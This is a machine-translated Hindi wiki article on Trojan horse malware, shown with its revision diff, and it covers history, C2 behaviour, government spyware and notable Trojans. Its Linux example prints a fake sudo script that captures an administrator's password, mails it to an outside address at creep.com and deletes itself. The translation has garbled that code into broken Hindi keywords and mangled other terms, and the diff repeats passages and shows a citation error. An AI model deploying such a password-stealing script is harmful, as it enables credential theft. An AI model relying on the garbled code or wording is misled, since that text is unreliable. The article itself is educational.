ट्रोजन हॉर्स (कंप्यूटिंग): Difference between revisions

From Vigyanwiki
No edit summary
No edit summary
Line 9: Line 9:
}}</ref><ref>{{Cite news| title = ट्रोजन हॉर्स| work = Webopedia| access-date = 2012-04-05|url=http://www.webopedia.com/TERM/T/Trojan_horse.html}}</ref><ref>{{Cite web| title = ट्रोजन हॉर्स क्या है? - Whatis.com से परिभाषा| access-date = 2012-04-05| url = http://searchsecurity.techtarget.com/definition/Trojan-horse
}}</ref><ref>{{Cite news| title = ट्रोजन हॉर्स| work = Webopedia| access-date = 2012-04-05|url=http://www.webopedia.com/TERM/T/Trojan_horse.html}}</ref><ref>{{Cite web| title = ट्रोजन हॉर्स क्या है? - Whatis.com से परिभाषा| access-date = 2012-04-05| url = http://searchsecurity.techtarget.com/definition/Trojan-horse
}}</ref><ref>{{Cite web| title = ट्रोजन हॉर्स: [एमआईटी-हैकर-टर्न-एनएसए-स्पूक डैन एडवर्ड्स द्वारा गढ़ा गया] एन।| access-date = 2012-04-05| url = http://www.anvari.org/fortune/Miscellaneous_Collections/291162_trojan-horse-coined-by-mit-hacker-turned-nsa-spook-dan-edwards-n.html}}</ref>
}}</ref><ref>{{Cite web| title = ट्रोजन हॉर्स: [एमआईटी-हैकर-टर्न-एनएसए-स्पूक डैन एडवर्ड्स द्वारा गढ़ा गया] एन।| access-date = 2012-04-05| url = http://www.anvari.org/fortune/Miscellaneous_Collections/291162_trojan-horse-coined-by-mit-hacker-turned-nsa-spook-dan-edwards-n.html}}</ref>
ट्रोजन आमतौर पर [[सोशल इंजीनियरिंग (सुरक्षा)]] के किसी रूप से फैलते हैं; उदाहरण के लिए, जहां एक उपयोगकर्ता को अहानिकर दिखने के लिए एक [[ईमेल]] अटैचमेंट निष्पादित करने में धोखा दिया जाता है (उदाहरण के लिए, एक नियमित फॉर्म भरने के लिए), या सोशल मीडिया पर या कहीं और किसी नकली विज्ञापन पर क्लिक करके। यद्यपि उनका आयभार कुछ भी हो सकता है, कई आधुनिक रूप [[पिछले दरवाजे (कंप्यूटिंग)]] के रूप में कार्य करते हैं, एक नियंत्रक से संपर्क करते हैं जो प्रभावित कंप्यूटर तक अनधिकृत पहुंच प्राप्त कर सकते हैं।<ref>{{cite web |title=वायरस, वर्म और ट्रोजन के बीच अंतर|url=https://knowledge.broadcom.com/external/article?legacyId=tech98539 |website=Symantec Security Center |publisher=Broadcom Inc. |access-date=2020-03-29 |archive-url=https://archive.today/20130819122702/http://www.symantec.com/business/support/index?page=content&id=TECH98539#selection-3435.1-3585.1 |archive-date=2013-08-19 |url-status=live}}</ref>{{cbignore|bot=InternetArchiveBot}} [[रैंसमवेयर]] हमले अक्सर ट्रोजन का उपयोग करके किए जाते हैं।
ट्रोजन आमतौर पर [[सोशल इंजीनियरिंग (सुरक्षा)]] के किसी रूप से फैलते हैं; उदाहरण के लिए, जहां एक उपयोगकर्ता को अहानिकर दिखने के लिए एक [[ईमेल]] अटैचमेंट निष्पादित करने में धोखा दिया जाता है (उदाहरण के लिए, एक नियमित फॉर्म भरने के लिए), या सोशल मीडिया पर या कहीं और किसी नकली विज्ञापन पर क्लिक करके। यद्यपि उनका आयभार कुछ भी हो सकता है, कई आधुनिक रूप [[पिछले दरवाजे (कंप्यूटिंग)]] के रूप में कार्य करते हैं,  
 
एक नियंत्रक से संपर्क करते हैं जो प्रभावित कंप्यूटर तक अनधिकृत पहुंच प्राप्त कर सकते हैं।<ref>{{cite web |title=वायरस, वर्म और ट्रोजन के बीच अंतर|url=https://knowledge.broadcom.com/external/article?legacyId=tech98539 |website=Symantec Security Center |publisher=Broadcom Inc. |access-date=2020-03-29 |archive-url=https://archive.today/20130819122702/http://www.symantec.com/business/support/index?page=content&id=TECH98539#selection-3435.1-3585.1 |archive-date=2013-08-19 |url-status=live}}</ref>{{cbignore|bot=InternetArchiveBot}} [[रैंसमवेयर]] हमले अक्सर ट्रोजन का उपयोग करके किए जाते हैं।


[[कंप्यूटर वायरस]] और [[कंप्यूटर कीड़ा]] के विपरीत, ट्रोजन आमतौर पर खुद को अन्य फाइलों में नवीनता करने का प्रयास नहीं करते हैं या अन्यथा स्वयं को प्रचारित नहीं करते हैं।<ref>{{Cite web| title = वायरस-एल/कंप.वायरस अक्सर पूछे जाने वाले प्रश्न (एफएक्यू) v2.00 (प्रश्न बी3: ट्रोजन हॉर्स क्या है?)| url = http://faqs.cs.uu.nl/na-dir/computer-virus/faq.html| date = October 9, 1995| access-date = September 16, 2019| archive-date = August 5, 2020
[[कंप्यूटर वायरस]] और [[कंप्यूटर कीड़ा]] के विपरीत, ट्रोजन आमतौर पर खुद को अन्य फाइलों में नवीनता करने का प्रयास नहीं करते हैं या अन्यथा स्वयं को प्रचारित नहीं करते हैं।<ref>{{Cite web| title = वायरस-एल/कंप.वायरस अक्सर पूछे जाने वाले प्रश्न (एफएक्यू) v2.00 (प्रश्न बी3: ट्रोजन हॉर्स क्या है?)| url = http://faqs.cs.uu.nl/na-dir/computer-virus/faq.html| date = October 9, 1995| access-date = September 16, 2019| archive-date = August 5, 2020
Line 31: Line 33:


== व्यवहार ==
== व्यवहार ==
एक बार इंस्टॉल हो जाने पर, ट्रोजन कई प्रकार के दुर्भावनापूर्ण कार्य कर सकते हैं। कई इंटरनेट पर एक या एक से अधिक Botnet#Command and control (C2) सर्वर से संपर्क करते हैं और निर्देश का इंतजार करते हैं। चूंकि व्यक्तिगत ट्रोजन आमतौर पर इस संचार के लिए बंदरगाहों के एक विशिष्ट सेट का उपयोग करते हैं, इसलिए उनका पता लगाना अपेक्षाकृत सरल हो सकता है। इसके अलावा, दुर्भावनापूर्ण कार्रवाई के लिए एक प्रॉक्सी के रूप में इसका उपयोग करते हुए, अन्य मैलवेयर संभावित रूप से ट्रोजन पर कब्जा कर सकते हैं।<ref name="Crapanzano">{{cite report |last1=Crapanzano |first1=Jamie |title=सबसेवन का विखंडन, पसंद का ट्रोजन हॉर्स|date=2003 |url=http://www.sans.org/reading_room/whitepapers/malicious/deconstructing_subseven_the_trojan_horse_of_choice_953 |publisher=[[SANS Institute]] |access-date=2021-05-10}}</ref>
एक बार इंस्टॉल हो जाने पर, ट्रोजन कई प्रकार के दुर्भावनापूर्ण कार्य कर सकते हैं। कई इंटरनेट पर एक या एक से अधिक कमांड और कंट्रोल (C2) सर्वर से संपर्क करते हैं और निर्देश का इंतजार करते हैं। चूंकि व्यक्तिगत ट्रोजन आमतौर पर इस संचार के लिए बंदरगाहों के एक विशिष्ट सेट का उपयोग करते हैं, इसलिए उनका पता लगाना अपेक्षाकृत सरल हो सकता है। इसके अलावा, दुर्भावनापूर्ण कार्रवाई के लिए एक प्रॉक्सी के रूप में इसका उपयोग करते हुए, अन्य मैलवेयर संभावित रूप से ट्रोजन पर कब्जा कर सकते हैं।<ref name="Crapanzano">{{cite report |last1=Crapanzano |first1=Jamie |title=सबसेवन का विखंडन, पसंद का ट्रोजन हॉर्स|date=2003 |url=http://www.sans.org/reading_room/whitepapers/malicious/deconstructing_subseven_the_trojan_horse_of_choice_953 |publisher=[[SANS Institute]] |access-date=2021-05-10}}</ref>
जर्मन भाषी देशों में, सरकार द्वारा उपयोग किए जाने वाले या बनाए गए [[स्पाइवेयर]] को कभी-कभी गोववेयर कहा जाता है। Govware आमतौर पर एक ट्रोजन सॉफ़्टवेयर है जिसका उपयोग लक्ष्य कंप्यूटर से संचार को बाधित करने के लिए किया जाता है। स्विट्ज़रलैंड और जर्मनी जैसे कुछ देशों में इस तरह के सॉफ़्टवेयर के उपयोग को नियंत्रित करने वाला एक कानूनी ढांचा है।<ref name="cupa">Basil Cupa, [http://www.zora.uzh.ch/81157/1/Cupa_Living_in_Surveillance_Societies_2012.pdf Trojan Horse Resurrected: On the Legality of the Use of Government Spyware (Govware)], LISS 2013, pp. 419–428</ref><ref>{{cite web|url=http://www.ejpd.admin.ch/content/ejpd/de/home/themen/sicherheit/ueberwachung_des_post-/faq_vuepf.faq_3.html
 
जर्मन भाषी देशों में, सरकार द्वारा उपयोग किए जाने वाले या बनाए गए [[स्पाइवेयर]] को कभी-कभी गोववेयर कहा जाता है । गोववेयर आमतौर पर एक ट्रोजन सॉफ़्टवेयर है जिसका उपयोग लक्ष्य कंप्यूटर से संचार को बाधित करने के लिए किया जाता है। स्विट्ज़रलैंड और जर्मनी जैसे कुछ देशों में इस तरह के सॉफ़्टवेयर के उपयोग को नियंत्रित करने वाला एक कानूनी ढांचा है।<ref name="cupa">Basil Cupa, [http://www.zora.uzh.ch/81157/1/Cupa_Living_in_Surveillance_Societies_2012.pdf Trojan Horse Resurrected: On the Legality of the Use of Government Spyware (Govware)], LISS 2013, pp. 419–428</ref><ref>{{cite web|url=http://www.ejpd.admin.ch/content/ejpd/de/home/themen/sicherheit/ueberwachung_des_post-/faq_vuepf.faq_3.html
|title=अधिकतर पूछे जाने वाले सवाल| publisher=Federal Department of Justice and Police
|title=अधिकतर पूछे जाने वाले सवाल| publisher=Federal Department of Justice and Police
|url-status=dead| archive-url=https://web.archive.org/web/20130506102113/http://www.ejpd.admin.ch/content/ejpd/de/home/themen/sicherheit/ueberwachung_des_post-/faq_vuepf.faq_3.html| archive-date=May 6, 2013}}</ref> गोववेयर ट्रोजन के उदाहरणों में स्विस मिनी पैंजर और मेगा पैंजर शामिल हैं<ref name="tech">{{cite web|last1=Dunn|first1=John|title=स्विस कोडर सरकारी जासूस ट्रोजन का प्रचार करता है|url=http://news.techworld.com/security/3200593/swiss-coder-publicises-government-spy-trojan/|website=[[International Data Group|TechWorld]] |access-date=10 January 2021|archive-url=https://archive.today/20140126115729/http://news.techworld.com/security/3200593/swiss-coder-publicises-government-spy-trojan/|archive-date=26 January 2014|date=27 August 2009|url-status=dead}}{{cbignore|bot=InternetArchiveBot}}</ref> और स्टैट्रोजेनर | जर्मन राज्य ट्रोजन उपनाम R2D2।<ref name="cupa"/>जर्मन गोववेयर आम जनता के लिए अज्ञात सुरक्षा अंतराल का शोषण करके और अन्य अनुप्रयोगों के माध्यम से एन्क्रिप्ट किए जाने से पहले स्मार्टफोन डेटा तक पहुंच बनाकर काम करता है।<ref>{{Cite web |title = जर्मन संघीय पुलिस फोन एन्क्रिप्शन से बचने के लिए ट्रोजन वायरस का उपयोग करती है|url = http://www.dw.com/en/german-federal-police-use-trojan-virus-to-evade-phone-encryption/a-42328466| website = [[Deutsche Welle|DW]] | access-date = 2018-04-14}}</ref>
|url-status=dead| archive-url=https://web.archive.org/web/20130506102113/http://www.ejpd.admin.ch/content/ejpd/de/home/themen/sicherheit/ueberwachung_des_post-/faq_vuepf.faq_3.html| archive-date=May 6, 2013}}</ref> गोववेयर ट्रोजन के उदाहरणों में स्विस मिनीपैंजर और मेगापैंजर  <ref name="tech">{{cite web|last1=Dunn|first1=John|title=स्विस कोडर सरकारी जासूस ट्रोजन का प्रचार करता है|url=http://news.techworld.com/security/3200593/swiss-coder-publicises-government-spy-trojan/|website=[[International Data Group|TechWorld]] |access-date=10 January 2021|archive-url=https://archive.today/20140126115729/http://news.techworld.com/security/3200593/swiss-coder-publicises-government-spy-trojan/|archive-date=26 January 2014|date=27 August 2009|url-status=dead}}{{cbignore|bot=InternetArchiveBot}}</ref> और जर्मन "स्टेट ट्रोजन" उपनाम R2D2 शामिल है। <ref name="cupa" />जर्मन गोववेयर आम जनता के लिए अज्ञात सुरक्षा अंतराल का शोषण करके और अन्य अनुप्रयोगों के माध्यम से एन्क्रिप्ट किए जाने से पहले स्मार्टफोन डेटा तक पहुंच बनाकर काम करता है।<ref>{{Cite web |title = जर्मन संघीय पुलिस फोन एन्क्रिप्शन से बचने के लिए ट्रोजन वायरस का उपयोग करती है|url = http://www.dw.com/en/german-federal-police-use-trojan-virus-to-evade-phone-encryption/a-42328466| website = [[Deutsche Welle|DW]] | access-date = 2018-04-14}}</ref>
हैकर्स के बीच [[बोटनेट]] की लोकप्रियता और विज्ञापन सेवाओं की उपलब्धता के कारण, जो लेखकों को अपने उपयोगकर्ताओं की गोपनीयता का उल्लंघन करने की अनुमति देती हैं, ट्रोजन अधिक आम होते जा रहे हैं। [[BitDefender]] द्वारा जनवरी से जून 2009 तक किए गए एक सर्वेक्षण के अनुसार, ट्रोजन-प्रकार के मैलवेयर बढ़ रहे हैं, जो दुनिया में पाए गए वैश्विक मैलवेयर का 83% हिस्सा है। ट्रोजन का कीड़ों के साथ एक रिश्ता है, क्योंकि वे कीड़े द्वारा दी गई मदद से फैलते हैं और उनके साथ इंटरनेट पर यात्रा करते हैं।<ref>{{cite web |title=बिटडिफेंडर मालवेयर और स्पैम सर्वेक्षण ई-खतरे को ऑनलाइन व्यवहार प्रवृत्तियों के अनुकूल पाता है|url=http://news.bitdefender.com/NW1094-en--BitDefender-Malware-and-Spam-Survey-finds-E-Threats-Adapting-to-Online-Behavioral-Trends.html |website=[[Bitdefender|BitDefender]] |access-date=2020-03-27 |archive-url=https://web.archive.org/web/20090808080907/http://news.bitdefender.com/NW1094-en--BitDefender-Malware-and-Spam-Survey-finds-E-Threats-Adapting-to-Online-Behavioral-Trends.html |archive-date=2009-08-08 |url-status=dead}}</ref> बिटडिफेंडर ने कहा है कि लगभग 15% कंप्यूटर एक बॉटनेट के सदस्य हैं, आमतौर पर ट्रोजन संक्रमण द्वारा भर्ती किए जाते हैं।<ref>{{cite web
 
हैकर्स के बीच [[बोटनेट]] की लोकप्रियता और विज्ञापन सेवाओं की उपलब्धता के कारण, जो लेखकों को अपने उपयोगकर्ताओं की गोपनीयता का उल्लंघन करने की अनुमति देती हैं, ट्रोजन अधिक आम होते जा रहे हैं। [[BitDefender]] द्वारा जनवरी से जून 2009 तक किए गए एक सर्वेक्षण के अनुसार, "ट्रोजन-प्रकार के मैलवेयर बढ़ रहे हैं, जो दुनिया में पाए गए वैश्विक मैलवेयर का 83% हिस्सा हैै"। ट्रोजन का कीड़ों के साथ एक रिश्ता है, क्योंकि वे कीड़े द्वारा दी गई मदद से फैलते हैं और उनके साथ इंटरनेट पर यात्रा करते हैं।<ref>{{cite web |title=बिटडिफेंडर मालवेयर और स्पैम सर्वेक्षण ई-खतरे को ऑनलाइन व्यवहार प्रवृत्तियों के अनुकूल पाता है|url=http://news.bitdefender.com/NW1094-en--BitDefender-Malware-and-Spam-Survey-finds-E-Threats-Adapting-to-Online-Behavioral-Trends.html |website=[[Bitdefender|BitDefender]] |access-date=2020-03-27 |archive-url=https://web.archive.org/web/20090808080907/http://news.bitdefender.com/NW1094-en--BitDefender-Malware-and-Spam-Survey-finds-E-Threats-Adapting-to-Online-Behavioral-Trends.html |archive-date=2009-08-08 |url-status=dead}}</ref> बिटडिफेंडर ने कहा है कि लगभग 15% कंप्यूटर एक बॉटनेट के सदस्य हैं, आमतौर पर ट्रोजन संक्रमण द्वारा भर्ती किए जाते हैं।<ref>{{cite web
  |last=Datta
  |last=Datta
  |first=Ganesh
  |first=Ganesh
Line 46: Line 50:
  |access-date=2020-03-27
  |access-date=2020-03-27
  }}</ref>
  }}</ref>




Line 58: Line 63:
   | page = 42
   | page = 42
   | isbn = 0-8104-6267-2
   | isbn = 0-8104-6267-2
}}</ref> एक आसान प्रोग्राम Linux [[sudo]] कमांड का नया संस्करण है। आदेश को तब सार्वजनिक रूप से लिखने योग्य निर्देशिका में कॉपी किया जाता है <code>/tmp</code>. यदि कोई व्यवस्थापक उस निर्देशिका में होता है और निष्पादित करता है <code>sudo</code>, तो ट्रोजन हॉर्स को निष्पादित किया जा सकता है। यहाँ एक कार्यशील संस्करण है:
}}</ref> एक आसान प्रोग्राम Linux [[sudo]] कमांड का नया संस्करण है। आदेश को तब सार्वजनिक रूप से लिखने योग्य निर्देशिका में कॉपी किया जाता है <code>/tmp </code>यदि कोई व्यवस्थापक उस निर्देशिका में होता है और निष्पादित करता है <code>sudo</code>, तो ट्रोजन हॉर्स को निष्पादित किया जा सकता है। यहाँ एक कार्यशील संस्करण है:


<वाक्यविन्यास प्रकाश लैंग = श>
<वाक्यविन्यास प्रकाश लैंग = श>

Revision as of 15:20, 22 December 2022

कम्प्यूटिंग में, एक ट्रोजन हॉर्स कोई भी ऐसा मैलवेयर है जो उपयोगकर्ताओं को उसके वास्तविक इरादे से भ्रमित करता है। यह शब्द भ्रामक ट्रोजन हॉर्स की प्राचीन ग्रीक कहानी से लिया गया है ,जिसके कारण ट्रॉय शहर का पतन हुआ।[1][2][3][4][5] ट्रोजन आमतौर पर सोशल इंजीनियरिंग (सुरक्षा) के किसी रूप से फैलते हैं; उदाहरण के लिए, जहां एक उपयोगकर्ता को अहानिकर दिखने के लिए एक ईमेल अटैचमेंट निष्पादित करने में धोखा दिया जाता है (उदाहरण के लिए, एक नियमित फॉर्म भरने के लिए), या सोशल मीडिया पर या कहीं और किसी नकली विज्ञापन पर क्लिक करके। यद्यपि उनका आयभार कुछ भी हो सकता है, कई आधुनिक रूप पिछले दरवाजे (कंप्यूटिंग) के रूप में कार्य करते हैं,

एक नियंत्रक से संपर्क करते हैं जो प्रभावित कंप्यूटर तक अनधिकृत पहुंच प्राप्त कर सकते हैं।[6] रैंसमवेयर हमले अक्सर ट्रोजन का उपयोग करके किए जाते हैं।

कंप्यूटर वायरस और कंप्यूटर कीड़ा के विपरीत, ट्रोजन आमतौर पर खुद को अन्य फाइलों में नवीनता करने का प्रयास नहीं करते हैं या अन्यथा स्वयं को प्रचारित नहीं करते हैं।[7]


शब्द का प्रयोग

यह स्पष्ट नहीं है कि कब और कहाँ अवधारणा, और इसके लिए यह शब्द पहली बार इस्तेमाल किया गया था, लेकिन 1971 तक पहले यूनिक्स मैनुअल ने मान लिया था कि इसके पाठक दोनों को जानते हैं:[8]

Also, one may not change the owner of a file with the set—user—ID bit on, otherwise one could create Trojan Horses able to misuse other’s files.

एक और प्रारंभिक संदर्भ 1974 में मॉलटिक्स कंप्यूटर सिस्टम में भेद्यता के विश्लेषण पर अमेरिकी वायु सेना की रिपोर्ट में है।[9]

इसे केन थॉम्पसन द्वारा 1983 के अपने ट्यूरिंग अवार्ड स्वीकृति व्याख्यान "रिफ्लेक्शंस ऑन ट्रस्टिंग ट्रस्ट" में लोकप्रिय बनाया गया था।[10] सबटाइटल: किसी को किस हद तक एक कथन पर भरोसा करना चाहिए कि एक प्रोग्राम ट्रोजन हॉर्स से मुक्त है? सॉफ्टवेयर लिखने वाले लोगों पर भरोसा करना शायद ज्यादा जरूरी है। उन्होंने उल्लेख किया कि वे मल्टिक्स की सुरक्षा पर एक रिपोर्ट से ट्रोजन के संभावित अस्तित्व के बारे में जानते थे।[11][12]


व्यवहार

एक बार इंस्टॉल हो जाने पर, ट्रोजन कई प्रकार के दुर्भावनापूर्ण कार्य कर सकते हैं। कई इंटरनेट पर एक या एक से अधिक कमांड और कंट्रोल (C2) सर्वर से संपर्क करते हैं और निर्देश का इंतजार करते हैं। चूंकि व्यक्तिगत ट्रोजन आमतौर पर इस संचार के लिए बंदरगाहों के एक विशिष्ट सेट का उपयोग करते हैं, इसलिए उनका पता लगाना अपेक्षाकृत सरल हो सकता है। इसके अलावा, दुर्भावनापूर्ण कार्रवाई के लिए एक प्रॉक्सी के रूप में इसका उपयोग करते हुए, अन्य मैलवेयर संभावित रूप से ट्रोजन पर कब्जा कर सकते हैं।[13]

जर्मन भाषी देशों में, सरकार द्वारा उपयोग किए जाने वाले या बनाए गए स्पाइवेयर को कभी-कभी गोववेयर कहा जाता है । गोववेयर आमतौर पर एक ट्रोजन सॉफ़्टवेयर है जिसका उपयोग लक्ष्य कंप्यूटर से संचार को बाधित करने के लिए किया जाता है। स्विट्ज़रलैंड और जर्मनी जैसे कुछ देशों में इस तरह के सॉफ़्टवेयर के उपयोग को नियंत्रित करने वाला एक कानूनी ढांचा है।[14][15] गोववेयर ट्रोजन के उदाहरणों में स्विस मिनीपैंजर और मेगापैंजर [16] और जर्मन "स्टेट ट्रोजन" उपनाम R2D2 शामिल है। [14]जर्मन गोववेयर आम जनता के लिए अज्ञात सुरक्षा अंतराल का शोषण करके और अन्य अनुप्रयोगों के माध्यम से एन्क्रिप्ट किए जाने से पहले स्मार्टफोन डेटा तक पहुंच बनाकर काम करता है।[17]

हैकर्स के बीच बोटनेट की लोकप्रियता और विज्ञापन सेवाओं की उपलब्धता के कारण, जो लेखकों को अपने उपयोगकर्ताओं की गोपनीयता का उल्लंघन करने की अनुमति देती हैं, ट्रोजन अधिक आम होते जा रहे हैं। BitDefender द्वारा जनवरी से जून 2009 तक किए गए एक सर्वेक्षण के अनुसार, "ट्रोजन-प्रकार के मैलवेयर बढ़ रहे हैं, जो दुनिया में पाए गए वैश्विक मैलवेयर का 83% हिस्सा हैै"। ट्रोजन का कीड़ों के साथ एक रिश्ता है, क्योंकि वे कीड़े द्वारा दी गई मदद से फैलते हैं और उनके साथ इंटरनेट पर यात्रा करते हैं।[18] बिटडिफेंडर ने कहा है कि लगभग 15% कंप्यूटर एक बॉटनेट के सदस्य हैं, आमतौर पर ट्रोजन संक्रमण द्वारा भर्ती किए जाते हैं।[19]


लिनक्स उदाहरण

ट्रोजन हॉर्स एक कंप्यूटर प्रोग्राम है जो कुछ स्पष्ट कार्य करने का दावा करता है, फिर भी निष्पादन पर यह उपयोगकर्ता की सुरक्षा से समझौता करता है।[20] एक आसान प्रोग्राम Linux sudo कमांड का नया संस्करण है। आदेश को तब सार्वजनिक रूप से लिखने योग्य निर्देशिका में कॉपी किया जाता है /tmp ।यदि कोई व्यवस्थापक उस निर्देशिका में होता है और निष्पादित करता है sudo, तो ट्रोजन हॉर्स को निष्पादित किया जा सकता है। यहाँ एक कार्यशील संस्करण है:

<वाक्यविन्यास प्रकाश लैंग = श>

  1. सुडो
  2. ----
  1. कैरेक्टर इको को स्क्रीन पर बंद करें।

stty -गूंज

/bin/echo -n `whoami` के लिए पासवर्ड: एक्स पढ़ें /बिन/गूंज

  1. कैरेक्टर इको को वापस चालू करें।

stty गूंज

प्रतिध्वनि $x | mail -s `whoami` पासवर्ड @creep.com के बाहर नींद 1 गूंज क्षमा करें। आरएम $ 0

बाहर निकलें 0 </वाक्यविन्यास हाइलाइट>

कमांड लाइन आधारित ट्रोजन हॉर्स को रोकने के लिए, सेट करें . में प्रवेश PATH= पर्यावरण चर पूंछ के अंत में स्थित होना चाहिए। उदाहरण के लिए: PATH=/usr/local/bin:/usr/bin:..

उल्लेखनीय उदाहरण

निजी और सरकारी

सार्वजनिक रूप से उपलब्ध

  • ईजीएबीटीआर - 1980 के दशक के अंत में
  • नेटबस - 1998 (प्रकाशित)[21]
  • मोबमैन द्वारा प्रभात - 1999 (प्रकाशित)
  • पीछे का छिद्र - 1998 (प्रकाशित)
  • बीस्ट (ट्रोजन हॉर्स) - 2002 (प्रकाशित)
  • बिफ्रोस्ट (ट्रोजन हॉर्स) - 2004 (प्रकाशित)
  • डार्ककॉमेट - 2008-2012 (प्रकाशित)
  • ब्लैकहोल शोषण किट - 2012 (प्रकाशित)
  • घोस्ट आरएटी - 2009 (प्रकाशित)
  • मिनीपैंजर और मेगापैंजर - 2009 (प्रकाशित)[22][23]
  • Leurak द्वारा MEMZ - 2016 (प्रकाशित)

सुरक्षा शोधकर्ताओं द्वारा पता लगाया

  • बारह टोटके - 1990
  • क्लिकबॉट.ए - 2006 (खोजा गया)
  • ज़्यूस (ट्रोजन हॉर्स) - 2007 (खोजा गया)
  • ट्रोजन बैकडोर। फ्लैशबैक - 2011 (खोजा गया)
  • ज़ीरो एक्सेस बॉटनेट - 2011 (खोजा गया)
  • कोबफेस - 2008 (खोजा गया)
  • चोट - 2009 (खोजा गया)
  • कोरफ्लड - 2010 (खोजा गया)
  • टिनी बैंकर ट्रोजन - 2012 (खोजा गया)
  • सोवा - 2022 (खोजा गया)[24]
  • गवाह एंड्रॉइड मैलवेयर - 2015 (खोजा गया)[25][26]Cite error: Closing </ref> missing for <ref> tag[27][28]


पूंजीकरण

कंप्यूटर शब्द ट्रोजन हॉर्स प्राचीन शहर ट्रॉय के प्रसिद्ध ट्रोजन हॉर्स से लिया गया है। इस कारण ट्रोजन को अक्सर पूंजीकृत किया जाता है। हालाँकि, जबकि शैली मार्गदर्शिकाएँ और शब्दकोश भिन्न होते हैं, कई सामान्य उपयोग के लिए लोअर केस ट्रोजन का सुझाव देते हैं।[29][30]


यह भी देखें

संदर्भ

  1. Landwehr, Carl E.; Alan R. Bull; John P. McDermott; William S. Choi (1993). कंप्यूटर प्रोग्राम सुरक्षा दोषों का एक वर्गीकरण, उदाहरण के साथ (PDF). DTIC Document. CiteSeerX 10.1.1.35.997. Archived from the original on April 8, 2013. Retrieved April 5, 2012.
  2. "ट्रोजन हॉर्स परिभाषा". Retrieved April 5, 2012.
  3. "ट्रोजन हॉर्स". Webopedia. Retrieved April 5, 2012.
  4. "ट्रोजन हॉर्स क्या है? - Whatis.com से परिभाषा". Retrieved April 5, 2012.
  5. "ट्रोजन हॉर्स: [एमआईटी-हैकर-टर्न-एनएसए-स्पूक डैन एडवर्ड्स द्वारा गढ़ा गया] एन।". Retrieved April 5, 2012.
  6. "वायरस, वर्म और ट्रोजन के बीच अंतर". Symantec Security Center. Broadcom Inc. Archived from the original on August 19, 2013. Retrieved March 29, 2020.
  7. "वायरस-एल/कंप.वायरस अक्सर पूछे जाने वाले प्रश्न (एफएक्यू) v2.00 (प्रश्न बी3: ट्रोजन हॉर्स क्या है?)". October 9, 1995. Archived from the original on August 5, 2020. Retrieved September 16, 2019.
  8. Thompson, Ken; Ritchie, Dennis M. "यूनिक्स प्रोग्रामर मैनुअल, 3 नवम्बर 1971" (PDF). Retrieved March 28, 2020.
  9. Karger, P.A.; Schell, R.R., "Multics Security Evaluation: Vulnerability Analysis , ESD-TR-74-193" (PDF), HQ Electronic Systems Division: Hanscom AFB, MA, II
  10. Ken Thompson (1984). "ट्रस्टिंग ट्रस्ट पर प्रतिबिंब". Commun. ACM. 27 (8): 761–763. doi:10.1145/358198.358210..
  11. Paul A. Karger; Roger R. Schell (2002), "Thirty Years Later: Lessons from the Multics Security Evaluation" (PDF), ACSAC: 119–126
  12. Karger et Schell wrote that Thompson added this reference in a later version of his Turing conference: Ken Thompson (November 1989), "On Trusting Trust.", Unix Review, 7 (11): 70–74
  13. Crapanzano, Jamie (2003). सबसेवन का विखंडन, पसंद का ट्रोजन हॉर्स (Report). SANS Institute. Retrieved May 10, 2021.
  14. 14.0 14.1 Basil Cupa, Trojan Horse Resurrected: On the Legality of the Use of Government Spyware (Govware), LISS 2013, pp. 419–428
  15. "अधिकतर पूछे जाने वाले सवाल". Federal Department of Justice and Police. Archived from the original on May 6, 2013.
  16. Dunn, John (August 27, 2009). "स्विस कोडर सरकारी जासूस ट्रोजन का प्रचार करता है". TechWorld. Archived from the original on January 26, 2014. Retrieved January 10, 2021.
  17. "जर्मन संघीय पुलिस फोन एन्क्रिप्शन से बचने के लिए ट्रोजन वायरस का उपयोग करती है". DW. Retrieved April 14, 2018.
  18. "बिटडिफेंडर मालवेयर और स्पैम सर्वेक्षण ई-खतरे को ऑनलाइन व्यवहार प्रवृत्तियों के अनुकूल पाता है". BitDefender. Archived from the original on August 8, 2009. Retrieved March 27, 2020.
  19. Datta, Ganesh (August 7, 2014). "ट्रोजन क्या होते हैं?". SecurAid. Archived from the original on August 12, 2014. Retrieved March 27, 2020.
  20. Wood, Patrick H.; Kochan, Stephen G. (1985). यूनिक्स प्रणाली सुरक्षा. Hayden Books. p. 42. ISBN 0-8104-6267-2.
  21. Seth, Kulakow (1998). "क्या यह अभी भी एक ट्रोजन हॉर्स या वास्तविक वैध रिमोट कंट्रोल एडमिनिस्ट्रेशन टूल है?" (Report). SANS Institute. Retrieved May 10, 2021.
  22. "मेगा पैंजर". SourceForge.
  23. "मिनी टैंक". SourceForge.
  24. "सोवा वायरस क्या है?". India Today.
  25. "ट्रोजनाइज्ड एडवेयर परिवार जो भी ऐप चाहता है उसे इंस्टॉल करने के लिए एक्सेसिबिलिटी सेवा का दुरुपयोग करता है - लुकआउट ब्लॉग".
  26. Neal, Dave (November 20, 2015). "शेडुन ट्रोजन एडवेयर एंड्रॉइड एक्सेसिबिलिटी सर्विस को हिट कर रहा है". The Inquirer. Incisive Business Media. Archived from the original on November 22, 2015. Retrieved March 27, 2020.{{cite web}}: CS1 maint: unfit URL (link)
  27. Times, Tech (November 9, 2015). "एंड्रॉइड मालवेयर का नया परिवार हटाना वस्तुतः असंभव है: शेडुन, शुएनेट और शिफ्टीबग को नमस्ते कहें".
  28. "एंड्रॉइड एडवेयर खुद को तब भी इंस्टॉल कर सकता है जब उपयोगकर्ता स्पष्ट रूप से इसे अस्वीकार कर दें". November 19, 2015.
  29. "ट्रोजन". Collins Advanced Dictionary. Retrieved March 29, 2020.
  30. "ट्रोजन हॉर्स". Microsoft Style Guide. Microsoft. Retrieved March 29, 2020.


इस पेज में लापता आंतरिक लिंक की सूची

  • प्राचीन यूनानी
  • मिनीपैंजर और मेगापैंजर
  • विदेशी खुफिया सेवा (रूस)
  • एनोम
  • ेगाबत्र
  • घो0स्त चूहा
  • बिफ्रॉस्ट (ट्रोजन हॉर्स)
  • जानवर (ट्रोजन हॉर्स)
  • ज़ीउस (ट्रोजन हॉर्स)
  • जीरो एक्सेस बॉटनेट
  • शैली गाइड

बाहरी संबंध